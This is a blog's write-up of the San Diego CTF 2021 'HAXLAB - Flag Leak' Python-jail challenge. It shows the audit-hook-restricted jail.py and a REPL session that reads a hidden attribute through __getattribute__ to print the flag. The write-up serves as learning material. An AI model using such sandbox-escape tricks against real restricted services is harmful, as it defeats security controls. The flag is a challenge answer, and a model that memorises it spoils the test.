szymanski.ninja
About
CTF Writeups
Contact
pl|en

San Diego CTF 2021: HAXLAB - Flag Leak

HAXLAB - Flag Leak

Category: PWN

chal

MEDIUM

Welcome to HAXLAB, the world’s most secure MaaS® (math-as-a-service) with advanced functionality.

Note

For this part of the challenge, please submit the contents of flag1.txt.

jail.py

https://cdn.discordapp.com/attachments/840074210935177247/840076657075159040/jail.py

Connect via

nc haxlab.sdc.tf 1337

jail.py

#! /usr/bin/env python3
# flag2.txt and proprietary.py are in the working directory of the script in the hosted version
import sys
import proprietary # Our secure proprietary flag hider for flag1.txt

PROMPT = '>>> '

# Old Python versions are too vulnerable to exploits
if sys.version_info[:3] < (3, 8, 5):
    print("Sorry, your Python interpreter version is below the minimum system requirement to run HAXLAB.")
    sys.exit(1)

def audit_hook(event, _):
    # These are the only necessary events for this Math REPL to work
    ALLOWED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
    if event not in ALLOWED_EVENTS:
        # Thou shalt not hack!
        raise RuntimeError('Operation not permitted: {}'.format(event))

flag1 = proprietary.get_flag1()

def repl():
    global_dict = dict()
    global_dict['flag1'] = flag1
    while True:
        try:
            src = input(PROMPT)
        except EOFError:
            print() # print newline
            break
        except KeyboardInterrupt:
            print('canceled')
            continue
        if src == '': # Skip empty lines
            continue
        try:
            code = compile(src, '<string>', 'single')
        except SyntaxError as e:
            print(e)
            continue
        try:
            exec(code, global_dict)
        except Exception as e:
            print(e)

print('======= HAXLAB - An advanced yet secure calculator =======\nPowered by Python ' + sys.version)
# You will never trigger these hooks if all you do is Math :)
sys.addaudithook(audit_hook)
del sys
try:
    # Enter the HAXLAB shell for the user to do Math
    repl()
except Exception as e:
    print(e)

Solution

Below is self-explaining… 

>>> exec("print(dir())")
['__builtins__', 'flag1']
>>> print(flag1)
<proprietary.Flag1Holder object at 0x7fec38c32a3
>>> print(dir(flag1))
['-flag1-', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']
>>> print(flag1.__getattribute__('-flag1-'))
REDACTED
>>> print(flag1.__getattribute__('-flag1-')[:-1])
sdctf{get@ttr_r3ads_3v3ryth1ng}

submit

Flag

sdctf{get@ttr_r3ads_3v3ryth1ng}

Privacy Policy
luc © 2021